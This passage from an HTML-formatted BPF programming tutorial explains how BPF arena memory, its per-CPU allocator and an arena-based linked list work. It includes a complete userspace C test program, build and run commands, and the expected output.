&lt;p&gt;The program starts by defining the arena map itself. &lt;code&gt;BPF_MAP_TYPE_ARENA&lt;/code&gt; tells the kernel this is arena memory, and &lt;code&gt;BPF_F_MMAPABLE&lt;/code&gt; makes it accessible via &lt;code&gt;mmap()&lt;/code&gt; from userspace. The &lt;code&gt;max_entries&lt;/code&gt; field specifies how many pages (typically 4KB each) the arena can hold - here we allow up to 100 pages, or about 400KB. The &lt;code&gt;map_extra&lt;/code&gt; field sets where in the virtual address space the arena gets mapped, using different addresses for ARM64 vs x86-64 to avoid conflicts with existing mappings.&lt;/p&gt;

&lt;p&gt;After defining the map, we include arena helpers. The &lt;code&gt;bpf_arena_alloc.h&lt;/code&gt; file provides &lt;code&gt;bpf_alloc()&lt;/code&gt; and &lt;code&gt;bpf_free()&lt;/code&gt; functions - a simple memory allocator that works with arena pages, similar to &lt;code&gt;malloc()&lt;/code&gt; and &lt;code&gt;free()&lt;/code&gt; but specifically for arena memory. The &lt;code&gt;bpf_arena_list.h&lt;/code&gt; file implements doubly-linked list operations using arena pointers, including &lt;code&gt;list_add_head()&lt;/code&gt; to prepend nodes and &lt;code&gt;list_for_each_entry()&lt;/code&gt; to iterate safely.&lt;/p&gt;

&lt;p&gt;Our &lt;code&gt;elem&lt;/code&gt; structure contains the actual data. The &lt;code&gt;arena_list_node&lt;/code&gt; member provides the &lt;code&gt;next&lt;/code&gt; and &lt;code&gt;pprev&lt;/code&gt; pointers for linking nodes together - these are arena pointers marked with &lt;code&gt;__arena&lt;/code&gt;. The &lt;code&gt;value&lt;/code&gt; field holds our payload data. Notice the &lt;code&gt;__arena&lt;/code&gt; annotation on &lt;code&gt;list_head&lt;/code&gt; - this tells the verifier this pointer references arena memory, not normal kernel memory.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;arena_list_add()&lt;/code&gt; function creates list elements. It's marked &lt;code&gt;SEC("syscall")&lt;/code&gt; because userspace will trigger it using &lt;code&gt;bpf_prog_test_run()&lt;/code&gt;. The loop allocates new elements using &lt;code&gt;bpf_alloc(sizeof(*n))&lt;/code&gt;, which returns an arena pointer. We can then dereference &lt;code&gt;n-&amp;gt;value&lt;/code&gt; directly - the verifier allows this because &lt;code&gt;n&lt;/code&gt; is an arena pointer. The &lt;code&gt;list_add_head()&lt;/code&gt; call prepends the new node to the list using normal pointer manipulation, all happening in arena memory. The &lt;code&gt;can_loop&lt;/code&gt; check satisfies the verifier's bounded loop requirement.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;arena_list_del()&lt;/code&gt; function demonstrates iteration and cleanup. The &lt;code&gt;list_for_each_entry()&lt;/code&gt; macro walks the list following arena pointers. Inside the loop, we sum values and delete nodes. The &lt;code&gt;bpf_free(n)&lt;/code&gt; call returns memory to the arena allocator, decreasing the reference count and potentially freeing pages when the count hits zero.&lt;/p&gt;

&lt;p&gt;The address space cast feature is crucial. Some compilers support &lt;code&gt;__BPF_FEATURE_ADDR_SPACE_CAST&lt;/code&gt; which enables the &lt;code&gt;__arena&lt;/code&gt; annotation to work as a compiler address space. Without this support, we fall back to using explicit section annotations like &lt;code&gt;SEC(".addr_space.1")&lt;/code&gt;. The code checks for this feature and skips execution if it's not available, preventing runtime errors.&lt;/p&gt;

&lt;h3&gt;
  
  
  Complete User-Space Program: arena_list.c
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: GPL-2.0&lt;/span&gt;
&lt;span class="cm"&gt;/* Copyright (c) 2024 Meta Platforms, Inc. and affiliates. */&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdio.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdlib.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;unistd.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;sys/mman.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdint.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/libbpf.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"bpf_arena_list.h"&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"arena_list.skel.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;elem&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;arena_list_node&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;uint64_t&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;list_sum&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;arena_list_head&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;head&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;elem&lt;/span&gt; &lt;span class="n"&gt;__arena&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;sum&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;list_for_each_entry&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;head&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;sum&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;sum&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;test_arena_list_add_del&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;cnt&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;LIBBPF_OPTS&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_test_run_opts&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;opts&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;arena_list_bpf&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;expected_sum&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;u_int64_t&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;cnt&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cnt&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;sum&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;skel&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;arena_list_bpf__open_and_load&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to open and load BPF skeleton&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;bss&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;cnt&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;cnt&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_prog_test_run_opts&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_program__fd&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;progs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;arena_list_add&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;opts&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to run arena_list_add: %d&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;opts&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;retval&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"arena_list_add returned %d&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;opts&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;retval&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;bss&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;skip&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"SKIP: compiler doesn't support arena_cast&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="n"&gt;sum&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;list_sum&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;bss&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;list_head&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Sum of elements: %d (expected: %d)&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;sum&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;expected_sum&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_prog_test_run_opts&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_program__fd&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;progs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;arena_list_del&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;opts&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to run arena_list_del: %d&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="n"&gt;sum&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;list_sum&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;bss&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;list_head&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Sum after deletion: %d (expected: 0)&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;sum&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Sum computed by BPF: %d (expected: %d)&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;bss&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;list_sum&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;expected_sum&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;Test passed!&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nl"&gt;out:&lt;/span&gt;
    &lt;span class="n"&gt;arena_list_bpf__destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;cnt&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argc&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;cnt&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;atoi&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cnt&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Invalid count: %s&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Testing arena list with %d elements&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cnt&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;test_arena_list_add_del&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cnt&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Understanding the User-Space Code
&lt;/h3&gt;

&lt;p&gt;The userspace program demonstrates zero-copy access to arena memory. When we load the BPF skeleton using &lt;code&gt;arena_list_bpf__open_and_load()&lt;/code&gt;, libbpf automatically &lt;code&gt;mmap()&lt;/code&gt;s the arena into userspace. The pointer &lt;code&gt;skel-&amp;gt;bss-&amp;gt;list_head&lt;/code&gt; points directly into this mapped arena memory.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;list_sum()&lt;/code&gt; function walks the linked list from userspace. Notice we're using the same &lt;code&gt;list_for_each_entry()&lt;/code&gt; macro as the BPF code. The list is in arena memory, shared between kernel and userspace. Userspace can directly dereference arena pointers to access node values and follow &lt;code&gt;next&lt;/code&gt; pointers - no syscalls needed. This is the zero-copy benefit: userspace reads memory directly from the mapped region.&lt;/p&gt;

&lt;p&gt;The test flow orchestrates the demonstration. First, we set &lt;code&gt;skel-&amp;gt;bss-&amp;gt;cnt&lt;/code&gt; to specify how many list elements to create. Then &lt;code&gt;bpf_prog_test_run_opts()&lt;/code&gt; executes the &lt;code&gt;arena_list_add&lt;/code&gt; BPF program, which builds the list in arena memory. Once that returns, userspace immediately calls &lt;code&gt;list_sum()&lt;/code&gt; to verify the list by walking it directly from userspace - no syscalls, just direct memory access. The expected sum is calculated as 0+1+2+...+(cnt-1), which equals cnt*(cnt-1)/2.&lt;/p&gt;

&lt;p&gt;After verifying the list, we run &lt;code&gt;arena_list_del&lt;/code&gt; to remove all elements. This BPF program walks the list, computes its own sum, and calls &lt;code&gt;bpf_free()&lt;/code&gt; on each node. Userspace then verifies the list is empty by calling &lt;code&gt;list_sum()&lt;/code&gt; again, which should return 0. We also check that &lt;code&gt;skel-&amp;gt;bss-&amp;gt;list_sum&lt;/code&gt; matches our expected value, confirming the BPF program computed the correct sum before deleting nodes.&lt;/p&gt;

&lt;h2&gt;
  
  
  Understanding Arena Memory Allocation
&lt;/h2&gt;

&lt;p&gt;The arena allocator deserves a closer look because it shows how BPF programs can implement sophisticated memory management in arena space. The allocator in &lt;code&gt;bpf_arena_alloc.h&lt;/code&gt; uses a per-CPU page fragment approach to avoid locking.&lt;/p&gt;

&lt;p&gt;Each CPU maintains its own current page and offset. When you call &lt;code&gt;bpf_alloc(size)&lt;/code&gt;, it first rounds up the size to 8-byte alignment. If the current page has enough space at the current offset, it allocates from there by just decrementing the offset and returning a pointer. If not enough space remains, it allocates a fresh page using &lt;code&gt;bpf_arena_alloc_pages()&lt;/code&gt;, which is a kernel helper that gets arena pages from the kernel's page allocator. Each page maintains a reference count in its last 8 bytes, tracking how many allocated objects point into that page.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;bpf_free(addr)&lt;/code&gt; function implements reference-counted deallocation. It rounds the address down to the page boundary, finds the reference count, and decrements it. When the count reaches zero - meaning all objects allocated from that page have been freed - it returns the entire page to the kernel using &lt;code&gt;bpf_arena_free_pages()&lt;/code&gt;. This page-level reference counting means individual &lt;code&gt;bpf_free()&lt;/code&gt; calls are fast, and memory is returned to the system only when appropriate.&lt;/p&gt;

&lt;p&gt;This allocator design avoids locks by using per-CPU state. Since BPF programs run with preemption disabled on a single CPU, the current CPU's page fragment can be accessed without synchronization. This makes &lt;code&gt;bpf_alloc()&lt;/code&gt; extremely fast - typically just a few instructions to allocate from the current page.&lt;/p&gt;

&lt;h2&gt;
  
  
  Compilation and Execution
&lt;/h2&gt;

&lt;p&gt;Navigate to the bpf_arena directory and build the example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;bpf-developer-tutorial/src/features/bpf_arena
make
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The Makefile compiles the BPF program with &lt;code&gt;-D__BPF_FEATURE_ADDR_SPACE_CAST&lt;/code&gt; to enable arena pointer support. It uses &lt;code&gt;bpftool gen object&lt;/code&gt; to process the compiled BPF object and generate a skeleton header that userspace can include.&lt;/p&gt;

&lt;p&gt;Run the arena list test with 10 elements:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./arena_list 10
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Expected output:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Testing arena list with 10 elements
Sum of elements: 45 (expected: 45)
Sum after deletion: 0 (expected: 0)
Sum computed by BPF: 45 (expected: 45)

Test passed!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Try it with more elements to see arena scaling:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./arena_list 100
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The sum should be 4950 (100*99/2). Notice that userspace can verify the list by directly accessing arena memory without any syscalls. This zero-copy access is what makes arena powerful for large data structures.&lt;/p&gt;

&lt;h2&gt;
  
  
  When to Use Arena vs Other BPF Maps
&lt;/h2&gt;

